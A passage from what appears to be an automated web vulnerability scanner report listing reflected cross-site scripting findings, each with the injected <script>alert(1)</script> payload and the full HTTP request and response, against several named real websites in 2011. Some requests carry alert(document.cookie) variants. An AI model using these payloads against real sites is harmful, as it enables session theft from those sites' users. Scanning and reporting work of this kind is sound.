Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:08 GMT
Content-Length: 205

Error handler problem:
Error Number: B80iwlBCmlTpz5Pig5CAws6o
Error Path: /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.63. http://api.blogburst.com/v1.0/WidgetDeliveryProxyStub.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryProxyStub.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e8e6e(a)55b1a46fc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7 HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:19 GMT
Content-Length: 207

Error handler problem:
Error Number: B94M87SkpIdWCgjC0l2bFGg
Error Path: /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.64. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryService.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4506(a)4a5cdf0844b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:36 GMT
Content-Length: 209

Error handler problem:
Error Number: B8WJgPc8mOdez6tZwoiCJoTl
Error Path: /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.65. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryService.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b1dc(a)5a857af5c5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:41 GMT
Content-Length: 208

Error handler problem:
Error Number: B7fOWSgosfbjAnIBtXULjlA
Error Path: /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.66. http://api.demandbase.com/api/v1/ip.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.demandbase.com
Path:   /api/v1/ip.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5fda3<script>alert(1)</script>05613b280fe was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1/ip.json?token=9629e1a2b682d7afd8c9cc104ad125c08fa0b490&callback=demandbase_parse5fda3<script>alert(1)</script>05613b280fe HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Wed, 02 Feb 2011 19:10:46 GMT
Server: Apache
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Connection: keep-alive
Content-Length: 94

demandbase_parse5fda3<script>alert(1)</script>05613b280fe({"isp":true,"ip":"173.193.214.243"})

4.67. http://apptools.com/examples/tableheight.php. [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /examples/tableheight.php.

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38302<script>alert(1)</script>c482f5e0c50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php. HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3788
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php was not able to be displayed.</p>
...[SNIP]...

4.68. http://apptools.com/examples/tableheight.php. [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /examples/tableheight.php.

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8e2a<script>alert(1)</script>5612df9d36a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3789
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a was not able to be displayed.</p>
...[SNIP]...

4.69. http://apptools.com/examples/tableheight.php. [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /examples/tableheight.php.

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 96edc<script>alert(1)</script>1447630590d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3792
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 was not able to be displayed.</p>
...[SNIP]...

4.70. http://apptools.com/styles/apptools.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/apptools.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2523f<script>alert(1)</script>3ded236ecaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:31 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css was not able to be displayed.</p>
...[SNIP]...

4.71. http://apptools.com/styles/apptools.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/apptools.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e507e<script>alert(1)</script>60df3ed154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/apptools.csse507e<script>alert(1)</script>60df3ed154 HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles/apptools.csse507e<script>alert(1)</script>60df3ed154 was not able to be displayed.</p>
...[SNIP]...

4.72. http://apptools.com/styles/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/print.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78363<script>alert(1)</script>31482200f99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles78363<script>alert(1)</script>31482200f99/print.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:29 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles78363<script>alert(1)</script>31482200f99/print.css was not able to be displayed.</p>
...[SNIP]...

4.73. http://apptools.com/styles/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/print.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7876d<script>alert(1)</script>1b072629eeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/print.css7876d<script>alert(1)</script>1b072629eeb HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles/print.css7876d<script>alert(1)</script>1b072629eeb was not able to be displayed.</p>
...[SNIP]...

4.74. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9fb5f<script>alert(1)</script>bb7775bca59 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=39fb5f<script>alert(1)</script>bb7775bca59&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"39fb5f<script>alert(1)</script>bb7775bca59", c2:"6035338", c3:"5070033", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.75. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload a97d8<script>alert(1)</script>9a0c4e010c5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338a97d8<script>alert(1)</script>9a0c4e010c5&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338a97d8<script>alert(1)</script>9a0c4e010c5", c3:"5070033", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.76. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 29d7a<script>alert(1)</script>1b41605cfe3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=507003329d7a<script>alert(1)</script>1b41605cfe3&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"507003329d7a<script>alert(1)</script>1b41605cfe3", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.77. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 950d1<script>alert(1)</script>79857982068 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

